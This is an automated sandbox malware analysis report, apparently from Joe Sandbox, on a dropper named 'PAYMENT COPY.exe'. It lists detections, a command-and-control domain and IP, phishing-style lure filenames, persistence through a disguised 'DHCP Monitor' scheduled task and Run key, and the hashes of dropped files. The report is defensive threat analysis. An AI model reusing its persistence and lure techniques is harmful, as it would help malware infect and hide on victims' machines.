    0.2.PAYMENT COPY.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
    15.2.dhcpmon.exe.400000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
    7.0.PAYMENT COPY.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
    1.2.PAYMENT COPY.exe.400000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
    1.1.PAYMENT COPY.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
    15.0.dhcpmon.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
    7.2.PAYMENT COPY.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
    8.2.PAYMENT COPY.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
    8.2.PAYMENT COPY.exe.49c0000.10.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
    8.0.PAYMENT COPY.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
    1.0.PAYMENT COPY.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

    Domains

    SourceDetectionScannerLabelLink
    chinomso.duckdns.org8%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    chinomso.duckdns.org8%VirustotalBrowse
    chinomso.duckdns.org0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    chinomso.duckdns.org
    		185.150.24.55
    		truetrueunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    chinomso.duckdns.orgtrue
    • 8%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://nsis.sf.net/NSIS_Errordhcpmon.exe, dhcpmon.exe, 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp, dhcpmon.exe, 0000000E.00000000.270226951.000000000040A000.00000008.00020000.sdmp, dhcpmon.exe, 0000000F.00000000.273721399.000000000040A000.00000008.00020000.sdmp, PAYMENT COPY.exefalse
      		high
      http://nsis.sf.net/NSIS_ErrorErrorPAYMENT COPY.exefalse
        		high

        Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public

        IPDomainCountryFlagASNASN NameMalicious
        185.150.24.55
        		unknownNetherlands
        		44592SKYLINKNLtrue

        General Information

        Joe Sandbox Version:31.0.0 Emerald
        Analysis ID:356453
        Start date:23.02.2021
        Start time:08:10:56
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 13m 11s
        Hypervisor based Inspection enabled:false
        Report type:full
        Sample file name:PAYMENT COPY.exe
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed:36
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.evad.winEXE@16/24@13/1
        EGA Information:Failed
        HDC Information:
        • Successful, ratio: 17.6% (good quality ratio 16.6%)
        • Quality average: 79.1%
        • Quality standard deviation: 29.2%
        HCA Information:
        • Successful, ratio: 87%
        • Number of executed functions: 151
        • Number of non-executed functions: 95
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .exe
        Warnings:
        Show All
        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
        • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
        • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 51.132.208.181, 13.64.90.137, 92.122.145.220, 104.42.151.234, 168.61.161.212, 184.30.20.56, 51.104.144.132, 51.103.5.159, 93.184.221.240, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129, 51.11.168.160
        • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, vip1-par02p.wns.notify.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        08:11:56Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user\Desktop\PAYMENT COPY.exe" s>$(Arg0)
        08:11:56API Interceptor1004x Sleep call for process: PAYMENT COPY.exe modified
        08:11:58Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
        08:11:59AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        185.150.24.55CHEQUE COPY RECEIPT.exeGet hashmaliciousBrowse
          CHEQUE COPY.exeGet hashmaliciousBrowse
            CHEQUE COPY.jarGet hashmaliciousBrowse
              PAYMENT COPY RECEIPT.exeGet hashmaliciousBrowse
                FeDEx TRACKING DETAILS.exeGet hashmaliciousBrowse
                  FeDEx TRACKING DETAILS.exeGet hashmaliciousBrowse
                    FedEx TRACKING DETAILS.exeGet hashmaliciousBrowse
                      TNT TRACKING DETAILS.exeGet hashmaliciousBrowse
                        TNT TRACKING DETAILS.exeGet hashmaliciousBrowse

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          chinomso.duckdns.orgCHEQUE COPY RECEIPT.exeGet hashmaliciousBrowse
                          • 185.150.24.55
                          CHEQUE COPY.exeGet hashmaliciousBrowse
                          • 185.150.24.55
                          PAYMENT COPY RECEIPT.exeGet hashmaliciousBrowse
                          • 185.150.24.55
                          Shiping Doc BL.exeGet hashmaliciousBrowse
                          • 194.5.98.157
                          Shiping Doc BL.exeGet hashmaliciousBrowse
                          • 194.5.98.157
                          Shiping Doc BL.exeGet hashmaliciousBrowse
                          • 194.5.98.157
                          Shiping Doc BL.exeGet hashmaliciousBrowse
                          • 194.5.98.157
                          Shiping Doc BL.exeGet hashmaliciousBrowse
                          • 194.5.98.157
                          Shiping Doc BL.exeGet hashmaliciousBrowse
                          • 194.5.98.157
                          DHL AWB TRACKING DETAIL.exeGet hashmaliciousBrowse
                          • 194.5.98.56
                          odou7cg844.exeGet hashmaliciousBrowse
                          • 129.205.124.145
                          DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                          • 185.244.30.86
                          AWB RECEIPT.exeGet hashmaliciousBrowse
                          • 129.205.124.132
                          TNT AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                          • 129.205.113.246
                          DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                          • 197.210.227.36
                          DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                          • 185.244.30.39
                          TNT AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                          • 129.205.124.140
                          DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                          • 197.210.85.85
                          DHL AWB TRACKING DETAIILS.exeGet hashmaliciousBrowse
                          • 185.244.30.39
                          39Quot.exeGet hashmaliciousBrowse
                          • 185.165.153.35

                          ASN

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          SKYLINKNLCHEQUE COPY RECEIPT.exeGet hashmaliciousBrowse
                          • 185.150.24.55
                          CHEQUE COPY.exeGet hashmaliciousBrowse
                          • 185.150.24.55
                          Quotation-3276.PDF.exeGet hashmaliciousBrowse
                          • 185.150.24.44
                          CHEQUE COPY.jarGet hashmaliciousBrowse
                          • 185.150.24.55
                          MRC20201030XMY, pdf.exeGet hashmaliciousBrowse
                          • 185.150.24.6
                          PAYMENT COPY RECEIPT.exeGet hashmaliciousBrowse
                          • 185.150.24.55
                          FeDEx TRACKING DETAILS.exeGet hashmaliciousBrowse
                          • 185.150.24.55
                          FeDEx TRACKING DETAILS.exeGet hashmaliciousBrowse
                          • 185.150.24.55
                          FedEx TRACKING DETAILS.exeGet hashmaliciousBrowse
                          • 185.150.24.55
                          TNT TRACKING DETAILS.exeGet hashmaliciousBrowse
                          • 185.150.24.55
                          TNT TRACKING DETAILS.exeGet hashmaliciousBrowse
                          • 185.150.24.55
                          QUOTATION 20 10 2020.exeGet hashmaliciousBrowse
                          • 185.150.24.48
                          NEW PO638363483.exeGet hashmaliciousBrowse
                          • 185.150.24.9
                          NEW PO6487382.exeGet hashmaliciousBrowse
                          • 185.150.24.9

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          C:\Users\user\AppData\Local\Temp\nsc2504.tmp\System.dllOur New Order Feb 23 2021 at 2.30_PVV440_PDF.exeGet hashmaliciousBrowse
                            INV_PR2201.docmGet hashmaliciousBrowse
                              CV-JOB REQUEST______PDF.EXEGet hashmaliciousBrowse
                                Request for Quotation.exeGet hashmaliciousBrowse
                                  #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                    Purchase Order___pdf ____________.exeGet hashmaliciousBrowse
                                      quote.exeGet hashmaliciousBrowse
                                        Order83930.exeGet hashmaliciousBrowse
                                          Invoice 6500TH21Y5674.exeGet hashmaliciousBrowse
                                            Invoice 6500TH21Y5674.exeGet hashmaliciousBrowse
                                              GPP.exeGet hashmaliciousBrowse
                                                OrderSuppliesQuote0817916.exeGet hashmaliciousBrowse
                                                  ACCOUNT DETAILS.exeGet hashmaliciousBrowse
                                                    Quotation.com.exeGet hashmaliciousBrowse
                                                      Unterlagen PDF.exeGet hashmaliciousBrowse
                                                        QuotationInvoices.exeGet hashmaliciousBrowse
                                                          PO.exeGet hashmaliciousBrowse
                                                            SecuriteInfo.com.TrojanSpy.MSIL.Agent.22886.exeGet hashmaliciousBrowse
                                                              SecuriteInfo.com.FileRepMalware.24882.exeGet hashmaliciousBrowse
                                                                PDF_doc.exeGet hashmaliciousBrowse

                                                                  Created / dropped Files

                                                                  C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                  Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                  Category:dropped
                                                                  Size (bytes):332412
                                                                  Entropy (8bit):7.946662165967432
                                                                  Encrypted:false
                                                                  SSDEEP:6144:S11QoY9YMstdr55cZ+TsUHBL5xY9j2DLWkl3TsJxdxEn7mZ:+Yxk55cZ+NhL5i9SWkRIjdxBZ
                                                                  MD5:53E8C460446FE305DFC2159961AA6234
                                                                  SHA1:BBEBCE3965DFC237EAC2711A47C141A4F8FF0083
                                                                  SHA-256:B082AA828DD2EB42D6E1DE8CCD8573AC3096CEEE92AD26449FC1DF6E490FF4ED
                                                                  SHA-512:4043358BEFD7A7FAC79C6E244FC8ADB6CA0F61E1F1B8427875455AE82E3DF47EA982467BB2C993D4C6EAD382F2A3DA77FAFFEF96E53712A393C12445E07F01B2
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 35%
                                                                  Reputation:low
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...x.......4............@.......................................@.................................D...........`............................................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...XU...........~..............@....ndata...................................rsrc...`...........................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe:Zone.Identifier
                                                                  Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PAYMENT COPY.exe.log
                                                                  Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1216
                                                                  Entropy (8bit):5.355304211458859
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                                  MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                                  SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                                  SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                                  SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                                  Malicious:true
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
                                                                  Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1216
                                                                  Entropy (8bit):5.355304211458859
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                                  MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                                  SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                                  SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                                  SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                                  Malicious:true
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                  C:\Users\user\AppData\Local\Temp\extndbrvvs.aly
                                                                  Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):279040
                                                                  Entropy (8bit):7.999355482654256
                                                                  Encrypted:true
                                                                  SSDEEP:6144:SGrQWot55cT+FsUHBL5xy9j2DL+kl3ZsJx1xEnwXSIIV:SGBg55cT+zhL5A9S+kRmj1xpSIO
                                                                  MD5:CD58A93032A5720ED2F2E6DD9F615956
                                                                  SHA1:9CC17C0944B7124758E59842E59634EFDE088443
                                                                  SHA-256:FA902D29A67B5890704B4B05CF3EE1F3ECF3ED37BE037BE70B0943FA367D1C12
                                                                  SHA-512:9250A73290622C574D12E68417069A34329AB7D3F4F161D2F0A426814912CF0EB568E4EAB95EB3992A8B18192FDDF9BA895D250BA7C12AC526EA7D157EECC839
                                                                  Malicious:false
                                                                  Preview: k.......")3..Nf.YQ.e.........l..-..U.c.E%..nq.O...O.o,.ef......K.R'.j.,..I(..X.a(.)9;.c..].L.Q....b...Or....c..>zS1."R.6.?@g...).n'.{o.................b..L.~`.Ew..i-..R.L.M..=.C...Q.6.Se.'.h.o.. I..a.+..@...m3.......M. .....x=x...}.@..6...n....>..]]6....h.Z.0_..v..v .G..h..0.-....(.[N.I....dp.....['r.rWz .Mu..[,6......:fsL....S.....v.C.&0Q+pSMo`.DC)`..#...1j..<....=.....Rt.i..Y..m.5X...0.X..W.........m.cf...3.P@./R.=....v.%.-.=Fp..hU_..7 .n...Y."7}i6Csw).H....Ic.a..s.m.[....|.P........./I....z......1..'........./K.....1.......(.i..6.I........b~/z..M....W.........:0.I...+.....?....RC.Yu46...Z(.9[]..|..%...........G..}....~....?...N..h.O...|..m*Q...>Ux.l5.K..M..T&...EA>.C.I.%.>.be.z.N..-E.k......&...>... o..0/[(.........J...xA....:h!.{n*..........R.+.v.BGs".8......|...+M^.R...1t.$......yC....tk.d...#...Z..K...Y0...3.R..`..ZY...f_......z.0..\.Q....e..h..,$...R. ......5<..D...".\{.~.";.1...T.z.....W../zs.s...8.../D%KXu....x.......v.+.t.&L......Q.
                                                                  C:\Users\user\AppData\Local\Temp\nsc2504.tmp\System.dll
                                                                  Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:modified
                                                                  Size (bytes):11776
                                                                  Entropy (8bit):5.855045165595541
                                                                  Encrypted:false
                                                                  SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                  MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                  SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                  SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                  SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exe, Detection: malicious, Browse
                                                                  • Filename: INV_PR2201.docm, Detection: malicious, Browse
                                                                  • Filename: CV-JOB REQUEST______PDF.EXE, Detection: malicious, Browse
                                                                  • Filename: Request for Quotation.exe, Detection: malicious, Browse
                                                                  • Filename: #U007einvoice#U007eSC00978656.xlsx, Detection: malicious, Browse
                                                                  • Filename: Purchase Order___pdf ____________.exe, Detection: malicious, Browse
                                                                  • Filename: quote.exe, Detection: malicious, Browse
                                                                  • Filename: Order83930.exe, Detection: malicious, Browse
                                                                  • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious, Browse
                                                                  • Filename: Invoice 6500TH21Y5674.exe, Detection: malicious, Browse
                                                                  • Filename: GPP.exe, Detection: malicious, Browse
                                                                  • Filename: OrderSuppliesQuote0817916.exe, Detection: malicious, Browse
                                                                  • Filename: ACCOUNT DETAILS.exe, Detection: malicious, Browse
                                                                  • Filename: Quotation.com.exe, Detection: malicious, Browse
                                                                  • Filename: Unterlagen PDF.exe, Detection: malicious, Browse
                                                                  • Filename: QuotationInvoices.exe, Detection: malicious, Browse
                                                                  • Filename: PO.exe, Detection: malicious, Browse
                                                                  • Filename: SecuriteInfo.com.TrojanSpy.MSIL.Agent.22886.exe, Detection: malicious, Browse
                                                                  • Filename: SecuriteInfo.com.FileRepMalware.24882.exe, Detection: malicious, Browse
                                                                  • Filename: PDF_doc.exe, Detection: malicious, Browse
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\nsm24A5.tmp
                                                                  Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):306118
                                                                  Entropy (8bit):7.939787418337237
                                                                  Encrypted:false
                                                                  SSDEEP:6144:AtyGrQWot55cT+FsUHBL5xy9j2DL+kl3ZsJx1xEnwXSIIYt:QyGBg55cT+zhL5A9S+kRmj1xpSIH
                                                                  MD5:9B39D5926D9633B180D4AFB3E7CAAC40
                                                                  SHA1:06D5F9B6111F68E35F40A1AA609271F000DA23F1
                                                                  SHA-256:FFE073951D33F7DE224C4892F4EDE7B7368C9A37589263BB73D0B87014CF8D96
                                                                  SHA-512:D0FDA76963586867DCE03AEAE079EEB943EEF56776B909E239EB97200DFA8742F421C342D80D0617528527EF9E10C1869CFEAC8F3078A0F084368DFCC11FD053
                                                                  Malicious:false
                                                                  Preview: ........,...................$...............................................................................................................................................................................................................................................................J...............,...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\nsmD8C8.tmp\System.dll
                                                                  Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:modified
                                                                  Size (bytes):11776
                                                                  Entropy (8bit):5.855045165595541
                                                                  Encrypted:false
                                                                  SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                  MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                  SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                  SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                  SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\nsn16.tmp
                                                                  Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):22347
                                                                  Entropy (8bit):6.772137166768519
                                                                  Encrypted:false
                                                                  SSDEEP:384:A9QcELMTSkCWlpxuWR0O+mGS83jurV4pa4bg+T40K:AMLMukLPxuk3yp3K
                                                                  MD5:904BE663881896399EC80434BA4AFC15
                                                                  SHA1:FB5000F7CC9F3248EC9958E35704E60650A58B59
                                                                  SHA-256:9FD0A2635122A785EF88BE78C820EC044A90CFCD44CD8810EC09C736E160B4E8
                                                                  SHA-512:96100AAE73825DC66CEF953232E34744FB2451812CD2B85EDDDCC4FB8DE3FB81FF672B68AE57E82B3B3CA7B14CA56671035A640B1778B915E684DEEFAEFE4A5E
                                                                  Malicious:false
                                                                  Preview: ........,...................$...............................................................................................................................................................................................................................................................J...............,...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\nsoF70E.tmp\System.dll
                                                                  Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:modified
                                                                  Size (bytes):11776
                                                                  Entropy (8bit):5.855045165595541
                                                                  Encrypted:false
                                                                  SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                  MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                  SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                  SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                  SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\nsuF6DF.tmp
                                                                  Process:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):306118
                                                                  Entropy (8bit):7.939787418337237
                                                                  Encrypted:false
